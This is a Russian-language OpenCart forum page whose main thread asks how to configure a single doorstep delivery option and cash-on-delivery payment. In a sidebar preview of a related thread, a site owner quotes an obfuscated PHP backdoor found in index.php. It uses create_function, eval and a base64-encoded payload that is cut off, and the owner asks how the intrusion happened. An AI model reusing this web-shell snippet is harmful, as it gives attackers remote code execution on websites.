Jump to content
Sign in to follow this  
Ownell

Как правильно настроить доставку и оплату

Recommended Posts

Форумчане, доброго времени суток всем!

Вот, по-тихоньку, ковыряю свой сайт и столкнулся с такой проблемой. В интернет-магазине необходимо сделать 1 вид доставки: доставка до подъезда и 1 вид оплаты: оплата наличными при доставке. Вопрос, как это все грамотно настроить в админке опенкарта? К сожалению, пока не могу понять в чем проблема и выдает ошибку при оформлении заказа: Скриншот ошибки

А как настроены Дополнения=>Доставка и какие формы оплаты разрешены в Дополнения=>Оплата?

Покопайтесь в этих направлениях

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

• Similar Content

• By sabero
      Помогите, пожалуйста, как решить проблему. В дефолтном шаблоне (1 скрин) все подпункты в категории выдвигаются так, что их сразу видно. У меня же(2) они почему-то только со скроллом, и тот с чудовищной чувствительностью. Как решить проблему?

• By Anton999
      Приветствую!

Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя.

Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру.

Всем спасибо!
    • By jtgroup
      Добрый день!
      требуется начальная настройка сайта на поддомене. с последующим переносом на основной домен.
      сайт на ocstore 3.0 шаблон лайтшоп. установлены модули мультиязычности и джеткэш.
      1. в идеале запустить на php 7 сейчас php 5.6
      1.1 настройка .htaccess , настройка https 
      2. проверка работоспособности ( сейчас при переходе в категории бросает снова на главную)
      3. перенос сайта на основной домен. требуется чуть позже после того как я наполню сайт.

• By Ehanes
      Добрый день. Вопрос следующий: для отслеживания конверсий (целей) необходимо сделать кнопку "Показать телефон". Т.е. в шапке сайта телефон будет скрытый и отобразится только после клика клиента. Как это возможно реализовать? Если процесс трудоемкий - пишите в личку - обсудим вознаграждение.
    • By Caribe
      Здравствуйте, нужно настроить модуль Simple(Чтобы в оформлении заказа были города и регионы, чтобы при выборе города регион автоматически проставлялся, если человек выбирает пункты выдачи заказов, чтобы ему не надо было адрес вписывать.
      Доставка СДЭК 
      Пишите стоимость работы в лс 

• Recently Browsing   0 members

No registered users viewing this page.

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.